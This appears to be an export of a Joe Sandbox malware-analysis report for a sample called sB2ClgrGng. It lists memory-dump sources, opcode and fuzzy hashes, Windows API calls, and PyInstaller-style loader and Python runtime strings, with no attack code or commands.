                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9518776A1C6518AE764AB29C495238B3A1FB54B68F344131CE4D977ECCF3AE853C740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                • Instruction ID: 15d7a2431a19d4a11f563d0ae4337632b161b1573d42efeca41746c3cf93aa4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D518F36B1C6558AE724BB29C08263837A1EB45B59F244135CE4D9779DCF3AE843D780
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                • Instruction ID: e134614954fca49dad51d0baf9bce4a700c13fd027659bdf171bbd0060c6b608
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35517136A1C6558AE724BB29C08663877A1EB45F58F244131CE4D977AECF3AE853CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                • Instruction ID: a136c9a90b7e75d368b308520257206d218f5c7a4f304e5a3b8ceec0bfcd4515
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9519076A1CA518AE724AF29C08133837A1EB95F59F285131CE4D9779CDF3AE843C740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                • Instruction ID: 118c6c495666db132ef6688ec05530d398dd55f10adc48d6584f92677ec574f0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A541C862C0E74A4DE9A9B91C09996B42B80DF13BE0D5853B4DD9DE73DFCD0DE986C201
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                • Instruction ID: 09098bdc150ecd577935086e8df2098dbdc4635e590b0b11bcabf7468f67b9ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C41E532718A5586EF08EF2AD9A517973A1BB48FD0B499436EE0DD7B98DE3DD0428300
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                • Instruction ID: 923305a49ababe1563b277583e983548da1b4ed759a0ff6dbb759b2e35d4dbce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D317132B1DF4289E664BB25688212E6AD5AB85BE0F144238EE5D93BDADF3CD4118704
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                • Instruction ID: e0b039f63cb060e6e073acdbf6d926b5242e0c39f773fb796735a2e7b2a2615b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0E1716187958E9BA8AF6DB44362A76D4F748384B949039E989C2A18DE3CD4518F04
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                • Instruction ID: 9847bb88b6987a274be073067c321a2d3d5165845955afb24f1f013e2e8ef47f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58A00121A0CC0AD8E648BB44A8E20252260FB94701F800032E80DA60A8AE2DE444D200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875840
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875852
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875889
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487589B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758C6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758DF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758F1
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487590D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487591F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487593B
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487594D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875969
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487597B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875997
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759A9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759C5
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759D7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction ID: e726b319f87fac86e657827f38232fe81a3e5d189886ae629ab4691b479018e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F822A2A0A0DF47EAFB45FB55ACE257522A0BF94781F841435DC1E8266CEF3EF4599200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9
                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6448786B7,?,?,00000000,00007FF644873CBB), ref: 00007FF64487822C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                • Instruction ID: 9c5d0225fd342e8fe4fe236ab1661b09eeb1239abcb5892c460514a2d240e855
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73517111B2CE4699FA50FB29ECE36BA62A0EF94784F445435DE0EC26DDEE3DE5048340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction ID: 342efc223edf27d6efe885fa86135ee1c51794963c66c520f10f4686fe324ec9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8351D926618BA186D634BF26E4581BAB7A1F798B61F004135EFDE83798DF3CD045DB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction ID: 53fbc21aa26a1c8baebb89bf1b785cb32d0e9083d5ce3d1d857dcd68926cce1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76216221B0CE46CAEA41BB7AACD61796290FF88F90F584231DE1DC339CDE2CD5918211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction ID: 00d9f1a30a038057ea36a85810fac9fbb01438922ab9e1257e04274049b1e1a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF129571E0C2878AFB20BF14D1966797691FB50750F884935EE8DA66CCDF3CE9809B10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction ID: 1710dfed5af7060dc4ace23094578b604852e3ed78ce30615364b073edafc303
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
